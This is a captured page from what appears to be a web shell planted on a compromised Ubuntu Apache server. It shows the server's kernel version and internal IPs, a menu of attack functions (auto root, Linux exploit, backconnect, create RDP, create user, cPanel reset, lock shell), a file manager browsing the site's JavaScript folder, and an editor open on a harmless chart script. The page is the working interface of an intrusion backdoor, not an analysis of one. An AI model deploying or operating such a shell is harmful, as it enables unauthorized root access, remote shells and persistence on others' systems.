Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
admins /
javascripts /
ui-elements /
[ HOME SHELL ]
Name
Size
Permission
Action
examples.charts.js
8.22
KB
-rwxr-x--x
examples.lightbox.js
3.01
KB
-rwxr-x--x
examples.modals.js
1.8
KB
-rwxr-x--x
examples.nestable.js
625
B
-rwxr-x--x
examples.notifications.js
23.17
KB
-rwxr-x--x
examples.pic.charts.js
399
B
-rwxr-x--x
examples.portlets.js
418
B
-rwxr-x--x
examples.treeview.js
1.94
KB
-rwxr-x--x
examples.widgets.js
1.31
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : examples.widgets.js
(function( $ ) { 'use strict'; $(function() { /* Flot */ var plot = $.plot('#flotWidgetsSales1', flotWidgetsSales1Data, { series: { lines: { show: true, lineWidth: 2 }, points: { show: true }, shadowSize: 0 }, grid: { hoverable: true, clickable: true, borderColor: 'transparent', borderWidth: 1, labelMargin: 15, backgroundColor: 'transparent' }, yaxis: { min: 0, color: 'transparent' }, xaxis: { mode: 'categories', color: 'transparent' }, legend: { show: false }, tooltip: true, tooltipOpts: { content: '%x: %y', shifts: { x: -30, y: 25 }, defaultTheme: false } }); /* Morris */ Morris.Line({ resize: true, element: 'morrisLine', data: morrisLineData, grid: false, xkey: 'y', ykeys: ['a'], labels: ['Series A'], hideHover: 'always', lineColors: ['#FFF'], gridTextColor: 'rgba(255,255,255,0.4)' }); /* Sparkline: Bar */ $("#sparklineBar").sparkline(sparklineBarData, { type: 'bar', width: '80', height: '50', barColor: '#0088cc', negBarColor: '#B20000' }); $('.circular-bar-chart').appear(); }); }).apply(this, [ jQuery ]);
Close